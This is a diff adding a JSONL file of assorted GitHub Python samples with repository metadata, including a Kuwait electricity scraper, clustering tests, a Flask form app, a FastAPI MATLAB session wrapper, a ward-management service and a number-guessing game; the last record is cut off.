diff --git "a/4117.jsonl" "b/4117.jsonl" new file mode 100644--- /dev/null +++ "b/4117.jsonl" @@ -0,0 +1,1252 @@ +{"seq_id":"40798485267","text":"from . import *\n\nclass Switch(BaseLayer):\n \"\"\"\n Class representing a Switch in Sketch\n \"\"\"\n def parse_elem(self, elem):\n rect = None\n\n for child in elem[\"children\"]:\n if utils.word_in_str(\"bound\", child[\"id\"]):\n rect = child\n\n if rect is None:\n raise Exception(\"Switch: No bound in switch.\")\n\n elem[\"is_on\"] = utils.word_in_str(\"off\", elem[\"id\"])\n elem[\"rect\"] = rect\n return super().parse_elem(elem)\n","repo_name":"pixelcodeio/pixelcode","sub_path":"app/src/pixelcode/plugin/layers/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9870293657","text":"#!/usr/bin/env python3\n\"\"\"\nThis parser returns Kuwait's electricity system load (assumed to be equal to electricity production)\nSource: Ministry of Electricity and Water / State of Kuwait\nURL: https://www.mew.gov.kw/en/\nScroll down to see the system load gauge\nShares of Electricity production in 2017: 65.6% oil, 34.4% gas (source: IEA; https://www.iea.org/statistics/?country=KUWAIT&indicator=ElecGenByFuel)\n\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom logging import Logger, getLogger\n\nimport arrow\nfrom requests import Session\n\n\ndef fetch_consumption(\n zone_key: str = \"KW\",\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n):\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n r = session or Session()\n url = \"https://www.mew.gov.kw/en\"\n response = r.get(url)\n load = re.findall(r\"\\((\\d{4,5})\\)\", response.text)\n load = int(load[0])\n consumption = load\n\n datapoint = {\n \"zoneKey\": zone_key,\n \"datetime\": arrow.now(\"Asia/Kuwait\").datetime,\n \"consumption\": consumption,\n \"source\": \"mew.gov.kw\",\n }\n\n return datapoint\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the electricityMap backend, but handy for testing.\"\"\"\n\n print(\"fetch_consumption() ->\")\n print(fetch_consumption())\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/KW.py","file_name":"KW.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"11833786435","text":"##hhh=[1,2,3,4,5,\"abababab\"]\n##print(hhh)\n##for each in hhh:\n## print(each)\n##hhh[1]\n##hhh[-6]\n\n#增\n##heros=[\"ironman\",\"hulk\"]\n##heros.append(\"blackwidow\")#每次放一个\n##heros.extend([\"a\",\"b\",\"c\"])#放一堆\n\ns=[1,2,3,4,5]\ns[len(s):]=[6]\ns[len(s):]=[7,8,9]\nprint(s)\n\n#insert\ns=[1,3,4,5]\ns.insert(1,2)\ns.insert(0,0)\ns.insert(len(s),6)\nprint(s)\n\n#remove\ns.remove(5)\nprint(s)\n\ns.pop(5)\ns.clear()\nprint(s)\n","repo_name":"RINONIN/mangshe","sub_path":"foundation/character_.py","file_name":"character_.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26489950160","text":"\"\"\"Tests for the clustering algorithms.\"\"\"\nimport scipy.sparse\nimport pytest\nimport numpy as np\nfrom context import stag\nimport stag.graph\nimport stag.cluster\nimport stag.random\nimport stag.utility\n\n# Define the adjacency matrices of some useful graphs.\nC4_ADJ_MAT = scipy.sparse.csc_matrix([[0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0]])\nK6_ADJ_MAT = scipy.sparse.csc_matrix([[0, 1, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1], [1, 1, 0, 1, 1, 1],\n [1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 0]])\nBARBELL5_ADJ_MAT = scipy.sparse.csc_matrix([[0, 1, 1, 1, 1, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0, 0, 0, 0, 0],\n [1, 1, 0, 1, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 1, 1, 1, 0],\n ])\n\ndef test_spectral_clustering():\n graph = stag.graph.barbell_graph(10)\n labels = stag.cluster.spectral_cluster(graph, 2)\n gt_labels = stag.random.sbm_gt_labels(20, 2)\n assert stag.cluster.adjusted_rand_index(gt_labels, labels) == 1\n\n\ndef test_cheeger_cut():\n graph = stag.graph.barbell_graph(10)\n labels = stag.cluster.cheeger_cut(graph)\n gt_labels = stag.random.sbm_gt_labels(20, 2)\n assert stag.cluster.adjusted_rand_index(gt_labels, labels) == 1\n\n\ndef test_default_local_clustering():\n # Construct a graph object with the barbell adjacency matrix\n graph = stag.graph.Graph(BARBELL5_ADJ_MAT)\n\n # Find a local cluster near the first vertex\n cluster = stag.cluster.local_cluster(graph, 1, 21)\n\n # Assert that the correct clusters have been found.\n assert (set(cluster) == {0, 1, 2, 3, 4})\n\n\ndef test_local_clustering_float_weight():\n # Construct a graph object with the barbell adjacency matrix\n graph = stag.graph.Graph(BARBELL5_ADJ_MAT)\n\n # Find a local cluster near the first vertex\n cluster = stag.cluster.local_cluster(graph, 1, 20.23)\n\n # Assert that the correct clusters have been found.\n assert (set(cluster) == {0, 1, 2, 3, 4})\n\n\ndef test_acl_local_clustering():\n # Construct a graph object with a well-defined cluster structure\n graph = stag.graph.barbell_graph(10)\n\n # Run the acl clustering method\n cluster = stag.cluster.local_cluster_acl(graph, 0, 0.9, 0.0001)\n\n # Check that we found one of the clusters\n expected_cluster = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9}\n\n assert set(cluster) == expected_cluster\n\n\ndef test_approximate_pagerank():\n # For easier manual verification, we use a cycle graph with 0.5 weights on the edges\n adj = 0.5 * stag.graph.cycle_graph(4).adjacency()\n graph = stag.graph.Graph(adj)\n\n # Construct seed matrix.\n s = stag.utility.SprsMat([[1, 0, 0, 0]]).transpose()\n\n # Run the personalised pagerank and check that we get the right result\n p, r = stag.cluster.approximate_pagerank(graph, s, 1./3, 1./8)\n expected_p = [41./81, 2./27, 0, 2./27]\n expected_r = [5./81, 2./27 + 5./162, 2./27, 2./27 + 5./162]\n np.testing.assert_almost_equal(p.to_dense().transpose().tolist()[0], expected_p)\n np.testing.assert_almost_equal(r.to_dense().transpose().tolist()[0], expected_r)\n\n\ndef test_approximate_pagerank_no_push():\n # Test the behaviour of the approximate pagerank method when there is no\n # push operation.\n graph = 3 * stag.graph.cycle_graph(4)\n\n # Construct seed matrix.\n s = scipy.sparse.lil_matrix((1, 1))\n s[0, 0] = 1\n\n # Run the personalised pagerank and check that we get the right result\n p, r = stag.cluster.approximate_pagerank(graph, s.tocsc(), 1./3, 1./2)\n expected_p = [0]\n expected_r = [1]\n np.testing.assert_almost_equal(p.to_dense().transpose().tolist()[0], expected_p)\n np.testing.assert_almost_equal(r.to_dense().transpose().tolist()[0], expected_r)\n\n\ndef test_sweep_set():\n # Construct a simple graph to test with\n graph = stag.graph.barbell_graph(4)\n\n # Create the vector to test. The optimal conductance will be the first 4 vertices\n s = scipy.sparse.lil_matrix((8, 1))\n s[0, 0] = 0.1\n s[1, 0] = 0.25\n s[2, 0] = 0.2\n s[3, 0] = 0.15\n s[4, 0] = 0.05\n \n # Compute the sweep set\n sweep_set = stag.cluster.sweep_set_conductance(graph, s)\n assert type(sweep_set) == np.ndarray\n assert set(sweep_set) == {0, 1, 2, 3}\n\n\ndef test_connected_component():\n # Construct a graph with two connected components.\n graph = stag.random.sbm(10, 2, 1, 0)\n cc = stag.cluster.connected_component(graph, 0)\n assert type(cc) == np.ndarray\n assert set(cc) == {0, 1, 2, 3, 4}\n\n\ndef test_connected_components():\n # Construct a graph with two connected components\n graph = stag.random.sbm(10, 2, 1, 0)\n ccs = stag.cluster.connected_components(graph)\n assert type(ccs) == type([[1]])\n assert type(ccs[0]) == np.ndarray\n assert set(ccs[0]) == {0, 1, 2, 3, 4}\n assert set(ccs[1]) == {5, 6, 7, 8, 9}\n\n\ndef test_ari():\n gt_labels = [0, 0, 1, 1, 1, 1, 2, 2, 2, 2]\n labels = [0, 1, 0, 1, 1, 2, 2, 2, 2, 2]\n expected_ari = 0.31257344\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n # Check that we can pass numpy ndarray to the adjusted rand index\n # method\n labels = np.asarray(labels)\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n gt_labels = np.asarray(gt_labels)\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n\ndef test_nmi():\n gt_labels = [0, 0, 1, 1, 1, 1, 2, 2, 2, 2]\n labels = [0, 1, 0, 1, 1, 2, 2, 2, 2, 2]\n expected_nmi = 0.4558585\n actual_nmi = stag.cluster.normalised_mutual_information(gt_labels, labels)\n assert actual_nmi == pytest.approx(expected_nmi, 0.0001)\n\n # Check that we can call with numpy arrays\n actual_nmi = stag.cluster.normalised_mutual_information(np.asarray(gt_labels),\n np.asarray(labels))\n assert actual_nmi == pytest.approx(expected_nmi, 0.0001)\n\n # Check the exact clustering\n labels = [1, 1, 2, 2, 2, 2, 0, 0, 0, 0]\n actual_nmi = stag.cluster.normalised_mutual_information(gt_labels, labels)\n assert actual_nmi == 1\n\n\ndef test_conductance():\n g = stag.graph.barbell_graph(5)\n cluster = [0, 1, 2, 3, 4]\n expected_cond = 1/21\n cond = stag.cluster.conductance(g, cluster)\n assert cond == pytest.approx(expected_cond, 0.0001)\n\n # Try with an ndarray cluster\n cluster = np.asarray(cluster)\n cond = stag.cluster.conductance(g, cluster)\n assert cond == pytest.approx(expected_cond, 0.0001)\n\n\ndef test_sym_diff():\n s = [1, 4, 5, 2, 6]\n t = [1, 5, 3, 7]\n sym_diff = stag.cluster.symmetric_difference(s, t)\n assert set(sym_diff) == {2, 3, 4, 6, 7}\n\n # Check that ndarray arrays work\n s = np.asarray(s)\n t = np.asarray(t)\n sym_diff = stag.cluster.symmetric_difference(s, t)\n assert set(sym_diff) == {2, 3, 4, 6, 7}\n","repo_name":"staglibrary/stagpy","sub_path":"test/test_clustering.py","file_name":"test_clustering.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14969791217","text":"from pathlib import Path\n\n\ndef decode(code):\n l, r = 0, (1 << len(code))-1\n for ch in code:\n mid = l + (r-l)//2\n if ch == '0':\n r = mid\n else:\n l = mid+1\n return l\n\n\ndef calculate_seatid(row_number, col_number):\n return row_number*8+col_number\n\n\ndef part1(seat_codes):\n return max(calculate_seatid(decode(row_code), decode(col_code)) for row_code, col_code in seat_codes)\n\n# We can also use a sorted list, but time complexity will be O(NlogN) instead of O(N)\n\n\ndef part2(seat_codes):\n seatids = set([calculate_seatid(decode(row_code), decode(col_code))\n for row_code, col_code in seat_codes])\n l, r = min(seatids), max(seatids)\n for seatid in range(l+1, r):\n if seatid not in seatids:\n return seatid\n return -1\n\n\ndef process_input(file):\n def process_code(code):\n code = code.replace('F', '0').replace(\n 'L', '0').replace('B', '1').replace('R', '1')\n return code[:-3], code[-3:]\n\n return [(row_code, col_code) for row_code, col_code in [process_code(line.rstrip()) for line in file]]\n\n\nif __name__ == \"__main__\":\n script_path = Path(__file__).resolve()\n input_path = script_path.parent / '../inputs' / f'{script_path.stem}.txt'\n\n with input_path.open('r') as f:\n seat_codes = process_input(f)\n print(\"Part 1:\", part1(seat_codes))\n print(\"Part 2:\", part2(seat_codes))\n","repo_name":"FusionX9000/Advent-of-Code-2020","sub_path":"solutions/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20808280195","text":"# CircleTable - Yusuf Elsharawy, Christopher Liu, Naomi Naranjo\n# SoftDev\n# K14 -- Form and Function\n# 2021-10-14\n\nfrom flask import Flask # Facilitate flask webserving\nfrom flask import render_template # Facilitate jinja templating\nfrom flask import request # Facilitate form submission\n\n# Create Flask object\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef disp_loginpage():\n \"\"\"Returns the login page.\"\"\"\n return render_template(\"login.html\")\n\n\n@app.route(\"/auth\", methods=[\"GET\"])\ndef authenticate():\n \"\"\"Returns the responge page, including the username, request method, and\n greeting.\"\"\"\n if app.debug:\n print(\"\\n\\n\\n\")\n print(\"***DIAG: this Flask obj ***\")\n print(app)\n print(\"***DIAG: request obj ***\")\n print(request)\n print(\"***DIAG: request.args ***\")\n print(request.args)\n return render_template(\n \"response.html\", username=request.args[\"username\"], method=request.method\n )\n\n\nif __name__ == \"__main__\": # False if this file imported as module\n # Enable debugging, auto-restarting of server when this file is modified\n app.debug = True\n app.run()\n","repo_name":"Clue88/softdev-workshop","sub_path":"14_form/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70345738294","text":"from src.models.wardDb import WardDb\nfrom src.models.accountDb import AccountDb\nimport re\n\n\n# so sánh chuỗi với chuỗi regex\ndef validate_regex(input_string, regex):\n pattern = re.compile(regex)\n if pattern.fullmatch(input_string):\n return True\n return False\n\n\nclass WardServices:\n\n # Tìm 1 phường/xã trong 1 quận/huyện\n @staticmethod\n def exist_ward(id_acc, ward_id: str):\n # Validate ward_id , đầu vào có 6 chữ số\n regex_id = '^(0[1-9]|[1-9][0-9]){3}$'\n if not validate_regex(ward_id, regex_id):\n return 0 # Invalid ward_id\n elif id_acc != ward_id[0:4]:\n return 1 # not authorized\n ward = WardDb.find_by_id(ward_id)\n if ward:\n return ward\n return None # ward not exist\n\n # Cấp mã cho 1 xã/phường trong 1 huyện -> cấp 2 số\n @staticmethod\n def create_ward(id_acc: str, data: dict):\n ward_id = data[\"wardId\"]\n ward_name = data[\"wardName\"]\n\n # Validate ward_id (đầu vào là 2 số)\n regex_id = '^(0[1-9]|[1-9][0-9])$'\n if not validate_regex(ward_id, regex_id):\n return 0 # Invalid ward_id\n\n # wardId lưu ở database là 6 số\n data[\"wardId\"] = id_acc + ward_id\n if WardDb.find_by_dist_ward_name(id_acc, ward_name):\n return 1 # Tên xã/phường đã có trong quận/huyện\n if WardDb.find_by_id(data[\"wardId\"]):\n return 2 # Id đã được cấp cho xã khác\n w = WardDb(wardId=data[\"wardId\"], wardName=ward_name, districtId=id_acc, completed=None)\n try:\n w.save_to_db()\n except:\n return 3 # error save\n return 4 # added\n\n # Xoá 1 xã/phường khỏi danh sách\n @staticmethod\n def delete_ward(ward: WardDb):\n try:\n ward.delete_from_db()\n except:\n return 1 # err\n return 0 # deleted\n\n # Sửa thông tin 1 xã/phường\n @staticmethod\n def update_ward(id_acc: str, ward: WardDb, data: dict):\n ward_name = data[\"wardName\"]\n\n if ward_name == ward.wardName:\n return 0 # not change\n elif WardDb.find_by_dist_ward_name(id_acc, ward_name):\n return 1 # Name update already exists in other ward\n try:\n ward.wardName = ward_name\n ward.save_to_db()\n except:\n return 2 # error\n return None # updated\n\n # cập nhật tiến độ\n @staticmethod\n def completed(id_acc: str, data: dict):\n ward = WardDb.find_by_id(id_acc)\n completed = data[\"completed\"]\n if ward:\n if completed == ward.completed:\n return 2 # not change\n try:\n ward.completed = completed\n ward.save_to_db()\n except:\n return 3 # error\n return None # updated\n\n # List xã/phường\n @staticmethod\n def list_ward_in_district(dist_id: str):\n # validate\n regex_id = '^(0[1-9]|[1-9][0-9]){2}$'\n if not validate_regex(dist_id, regex_id):\n return 0 # Invalid dist_id\n wards = WardDb.find_by_district_id(dist_id)\n if wards:\n return wards\n return None\n\n @staticmethod\n def list_ward_progress(id: str):\n \"\"\"\n list wards managed by a specific district account\n no need to validate since input of this function is generated by backend\n :param id: account id\n :return: query result\n \"\"\"\n return WardDb.find_join_account(id)\n\n @staticmethod\n def list_ward_allocated(id: str):\n \"\"\"\n list wards managed by a specific district account\n no need to validate since input of this function is generated by backend\n :param id: account id\n :return: query result\n \"\"\"\n return WardDb.find_join_account_allocated(id)\n\n @staticmethod\n def list_ward_progress_specific(id_acc, id_req):\n \"\"\"\n list a specific ward managed by a specific district account\n no need to validate since input of this function is generated by backend\n :param id_acc: account id\n :param id_req: ward request id\n :return: query result\n \"\"\"\n return WardDb.find_join_account_specific(id_acc, id_req)\n\n @staticmethod\n def count_completed_wards(id_district):\n \"\"\"\n count total completed ward given a specific district\n :param id_district: id district\n :return: query result\n \"\"\"\n return WardDb.count_completed(id_district)\n\n @staticmethod\n def count_total_wards(id_district):\n \"\"\"\n count total ward given a specific district\n :param id_district: id district\n :return: query result\n \"\"\"\n return WardDb.count_total(id_district)\n\n @staticmethod\n def get_ward_name(id):\n return str(WardDb.find_ward_name(id)[0])\n\n @staticmethod\n def get_ward_completed(id):\n return WardDb.find_by_id(id).completed\n\n @staticmethod\n def check_exist(id):\n return int(WardDb.check_exist(id)) > 0\n","repo_name":"theminkantoso/citizenV.server","sub_path":"src/services/ward.py","file_name":"ward.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"43213131397","text":"from typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom matlab_interface import MatlabInterface\nfrom utils import Utils\nfrom session import Session\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport json\nimport os\nimport os.path\n\ntags_metadata = [\n {\n \"name\": \"main\",\n \"description\": \"Operations needed for the main application\",\n },\n {\n \"name\": \"extra\",\n \"description\": \"\",\n }\n]\n\napp = FastAPI(title=\"Matlab Online Workspace API\")\n\norigins = [\n \"http://localhost:4200\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nMAX_SESSIONS = 3\nHOME = 'D:\\\\Dropbox\\\\tfg\\\\Shazam-MATLAB\\\\app\\\\'\n\nutils = Utils()\nsessions = [Session(i) for i in range(1, MAX_SESSIONS+1)]\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Add /docs to URL to acces Matlab Online Workspace API\"}\n\n\ndef getSession(sid: int):\n availables = list(\n filter(lambda s: s.sid == sid, sessions))\n return availables[0] if len(availables) > 0 else None\n\n\n@app.get(\"/sessions\", tags=[\"main\"])\ndef getSessions():\n return {\"sessions\": [s.toJSON() for s in sessions]}\n\n\n@app.get(\"/taskList\", tags=[\"main\"])\ndef tasklist():\n tasks = utils.taskList()\n return utils.toJSON(tasks)\n\n\n@app.get(\"/newSession\", tags=[\"main\"])\ndef newSession():\n availables = list(filter(lambda s: s.pid is None, sessions))\n itsNotFull = len(availables) > 0\n\n if itsNotFull:\n utils.printS('Available Sessions:', availables)\n s = availables[0]\n index = sessions.index(s)\n sessions.pop(index)\n print('Initializing Matlab Session '+str(s.sid)+'...')\n s.matlab = MatlabInterface()\n s.pid = s.matlab.run_command(\"clear,feature('getpid')\", False)\n s.matlab.run_command(\"clear,path(path,'D:\\\\Dropbox\\\\tfg\\\\Shazam-MATLAB\\\\app\\\\')\", False)\n message = 'New Matlab process with PID='+s.pid\n sessions.insert(index, s)\n utils.printS('Updated Sessions: '+message, sessions)\n response = {\"result\": message, \"session\": s.toJSON()}\n else:\n message = 'No available sessions'\n response = {\"result\": message}\n return response\n\n\n@app.get(\"/startMatlab\", tags=[\"main\"])\ndef startMatlab(sid: int):\n response = None\n s = getSession(sid)\n\n isItAvailable = (s is not None) & (s.pid is None)\n\n if isItAvailable:\n utils.printS('Selected Session:', [s])\n index = sessions.index(s)\n sessions.pop(index)\n print('Initializing Matlab Session '+str(sid)+'...')\n s.matlab = MatlabInterface()\n #s.matlab.run_command('checkStart')\n s.pid = s.matlab.run_command(\"clear,feature('getpid')\", False)\n s.matlab.run_command('clear', False)\n message = 'New Matlab process with PID='+s.pid\n sessions.insert(index, s)\n\n utils.printS('Updated Sessions: '+message, sessions)\n response = {\"result\": message, \"session\": s.toJSON()}\n else:\n message = 'Session ' + str(sid)+' not available, already running PID=' + str(s.pid)\n response = {\"result\": message}\n print(message)\n return response\n\n\n@app.get(\"/stopMatlab\", tags=[\"main\"])\ndef stopMatlab(sid: int, restart: Optional[bool] = False):\n option = ' Restart ' if restart else ' Stop '\n print('Session '+str(sid)+option+'Selected')\n session = getSession(sid)\n if hasattr(session, 'matlab') & (session.pid is not None):\n session.matlab.stop()\n session.pid = None\n session.matlabPID = None\n session.matlab = None\n msg = 'Session '+str(sid) + ' stopped'\n response = startMatlab(session.sid) if restart else {\"result\": msg}\n else:\n msg = 'Session '+str(sid) + ' is not currently running!'\n response = {\"result\": msg}\n print(msg)\n return response\n\n\n@app.get(\"/run\", tags=[\"main\"])\ndef run(sid: int, commands: str):\n session = getSession(sid)\n figures = []\n if hasattr(session, 'matlab') & (session.pid is not None):\n print('Session '+str(sid)+': ')\n res = session.matlab.run_command(commands, True)\n figures = session.matlab.run_command('figures', False)\n try:\n figures = figures.replace('\\r', '').replace('\\n', '')\n except:\n figures = figures\n try:\n result = json.loads(res, strict=False)\n except:\n result = res\n try:\n figures = json.loads(figures, strict=False)\n except:\n figures = figures\n else:\n result = 'Session '+str(sid) + ' is not currently running!'\n return {\"result\": result, \"figures\": figures}\n\n\n@app.get(\"/getJSON\", tags=[\"extra\"])\ndef getJSON(fileName: str):\n with open(HOME+'db\\\\json\\\\'+fileName, 'r') as f:\n res = f.read()\n jsonRes = json.loads(res, strict=False)\n return jsonRes\n\n\n@app.get(\"/shouldUpdate\", tags=[\"extra\"])\ndef should_update():\n shouldUpdate = True\n musicDir = HOME+'music'\n fileNames = [filename for filename in os.listdir(musicDir)\n if os.path.isfile(os.path.join(musicDir, filename))]\n\n importedFiles = getJSON('metadata.json')\n sameSize = len(fileNames) <= len(importedFiles)\n\n if sameSize:\n for f in fileNames:\n found = list(filter(lambda i: f in i['Filename'], importedFiles))\n if len(found) > 0:\n shouldUpdate = False\n else:\n shouldUpdate = True\n break\n\n return shouldUpdate\n\n\n@app.post(\"/addTracks\", tags=[\"extra\"])\ndef add_tracks(sid: int):\n session = getSession(sid)\n if hasattr(session, 'matlab') & (session.pid is not None):\n res = session.matlab.run_script('justAddTracks')\n print(res)\n result = getJSON('metadata.json')\n else:\n result = 'Session '+str(sid) + ' is not currently running!'\n return {\"result\": result}\n\n\n@app.post(\"/test_shazam\", tags=[\"extra\"])\ndef test_shazam(sid: int, duration: Optional[int] = 3, wipe: Optional[bool] = False):\n session = getSession(sid)\n if hasattr(session, 'matlab') & (session.pid is not None):\n if wipe | should_update():\n print('Adding tracks...')\n add_tracks(sid)\n\n command = \"test_shazam {} {}\".format(duration, 0)\n result = session.matlab.run_command(command, True)\n print(result)\n print(json.loads(result))\n else:\n result = 'Session '+str(sid) + ' is not currently running!'\n return {\"result\": json.loads(result)}\n","repo_name":"nilodude/mow-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10941446365","text":"\"\"\"\r\nModule to get standarized data set\r\n\"\"\"\r\n\r\nimport reader\r\nimport math\r\nimport pandas as pd\r\n\r\nz_matrix=[]\r\nmatrix = reader.get_matrix()\r\nprint('Building z_matrix...')\r\n\r\n#returns n column from the matrix, without the heading\r\ndef get_col(col_number): \r\n array =[]\r\n for row in matrix:\r\n array.append(row[col_number])\r\n return array[1:]\r\n\r\n#get mean from an array\r\ndef mean(array):\r\n total=0\r\n for i in array:\r\n total=total + float(i)\r\n return total/len(array)\r\n\r\ndef standardDeviation(array, mean):\r\n total=0\r\n for i in array:\r\n total += (float(i)- float(mean))*(float(i) - float(mean))\r\n\r\n total=total/(len(array)-1)\r\n total=math.sqrt(total)\r\n return total\r\n\r\ndef zscore(element,mean,deviation):\r\n return (float(element)-float(mean))/float(deviation)\r\n\r\n#create a new 'z_matrix' with each value normalized\r\ndef normalization():\r\n z_matrix.append(matrix[0])\r\n for i in range(1,len(matrix)):\r\n row=[]\r\n row.append(matrix[i][0])\r\n row.append(matrix[i][1])\r\n for j in range(2,len(matrix[0])): \r\n col=get_col(j)\r\n x=matrix[i][j] \r\n m=mean(col)\r\n d=standardDeviation(col,m)\r\n row.append(round(zscore(x,m,d),2))\r\n z_matrix.append(row)\r\n \r\n\r\ndef get_z_matrix():\r\n return z_matrix\r\n\r\ndef to_csv():\r\n df = pd.DataFrame(z_matrix)\r\n df=df.drop(0) #delete headers\r\n df=df.drop(0,axis=1) #delete 'id' column\r\n df.to_csv(\"z_matrix.csv\", header=None, index=None)\r\n print('z_matrix.csv created!')\r\n\r\nnormalization()\r\nto_csv()\r\n\r\n\r\n\r\n\r\n","repo_name":"jmguevara/Proyecto1_IA","sub_path":"standardization.py","file_name":"standardization.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25124196895","text":"import random\nimport os\nimport sys\nfrom time import sleep\n\n# Pogadjanje broja, svaki put kad pocne partija dato je 5 poena, na svaku gresku se oduzima jedan i ako se stigne do 0, racunar je pobedio, ako ne, korisnik je pobedio i ispisuje se rezultat\n# Ako je na kraju broj poena veci(ili jednak) od proslog High Score, prosli highscore = broj poena i ispisuje se datum i vreme u kojem ja napravljen novi highscore, highscore se moze prikazati pritiskom na taster 2 iz glavnog menija\n# Ideja - postoji text file iz koga ce se citati highscore i tako omoguciti da se highscore sacuva i nakon gasenja programa.\n\ntry:\n file = open('high_score.txt', 'r')\n high_score = file.read()\n high_score = int(high_score[0])\n file.close()\nexcept:\n high_score = 0\n\ndef menu():\n os.system('cls')\n print(\"Enter your choice:\")\n print(\"1. Play\\n2. High Scores\\n3. Exit game\\n\")\n menu_choice = input()\n while menu_choice not in [\"1\", \"2\", \"3\"]:\n print(\"Invalid choice, please choose between 1, 2 and 3...\")\n menu_choice = input()\n if(menu_choice == \"1\"):\n game()\n elif(menu_choice == \"2\"):\n high_scores()\n else:\n exit()\n \n \n\ndef game():\n os.system('cls')\n global name\n name = input(\"What's your name? \\n\")\n print(f\"Hello {name}, welcome to the game!\\n\")\n\n play_game = input(\"Do you want to play the game? Answer with a simple yes/no\\n\").lower()\n\n if(play_game == \"no\"):\n print(\"Okay, have a good one.\")\n exit\n elif(play_game == \"yes\"):\n print(\"Starting the game...\")\n game_start()\n else:\n print(\"That's not a valid option...\")\n exit()\n \ndef game_start():\n global high_name\n global high_score\n global points\n os.system('cls')\n choice = 1\n points = 5\n again = \"yes\"\n\n random_num = random.randint(1, 10)\n print(\"This is a number guessing game, each time you play you'll be guessing a random number that i generated (1-10).\\nAfter each miss, your points will be deducted, and if you reach zero... i win.\")\n sleep(1) # PUT BACK TO 7\n while points > 0 and again == \"yes\":\n os.system('cls')\n print(random_num) # REMOVE\n guess = int(input(\"Input your guess: \"))\n if(guess != random_num):\n print(\"Mistake.\")\n points = points - 1\n print(f\"Total points: {points}\",)\n if(points == 0):\n print(\"You lose...\")\n sleep(1)\n exit()\n else:\n sleep(1)\n else:\n print(f\"Goodjob, you guessed the number! Total amount of points {points}\")\n num = high_score\n if(points > num):\n num = points\n high_name = name\n again = input(\"Do you want to play again? yes/no...\\n\").lower()\n points = 5\n while again not in [\"yes\", \"no\"]:\n again = input(\"Invalid choice, Do you want to play again? yes/no...\\n\").lower()\n os.system('cls')\n print(\"Farewell...\")\n high_score = num\n high_score = str(high_score)\n sleep(1)\n file = open('high_score.txt', 'w')\n file.write(high_score + f\" - {high_name}\")\n file.close()\n menu()\n\ndef high_scores():\n file = open('high_score.txt', 'r')\n high_score = file.read()\n file.close()\n os.system('cls')\n try:\n print(f\"Current highscore: \\n\\n{high_score}\")\n except:\n print(\"There is no new high scores..\")\n sleep(3)\n menu()\n \n\n \n\nif __name__ == '__main__':\n menu()\n \n","repo_name":"Simon0568/PythonProjects","sub_path":"numGuess/numGuess.py","file_name":"numGuess.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4821236287","text":"import numpy as np\ndef elipse_parameters(sub):\n x0 = (np.min(sub['x'])+np.max(sub['x']))/2. #x-position of the center\n y0 = (np.min(sub['y'])+np.max(sub['y']))/2. #y-position of the center\n a = np.absolute(np.min(sub['x'])-np.max(sub['x']))/2.#radius on the x-axis\n b = np.absolute(np.min(sub['y'])-np.max(sub['y']))/2.#radius on the y-axis\n return {\"x0\":x0,\"y0\":y0,\"a\":a,\"b\":b}\n\ndef elipse(sub, error=0.01):\n e = elipse_parameters(sub)\n value = ((sub['x'] - e['x0'])/e['a'])**2 + ((sub['y'] - e['y0'])/e['b'])**2\n indTrue = np.where((value > 1.- error)*(value < 1.+ error))[0]\n #indFalse = np.setdiff1d(np.arange(len(x)),indTrue)\n return 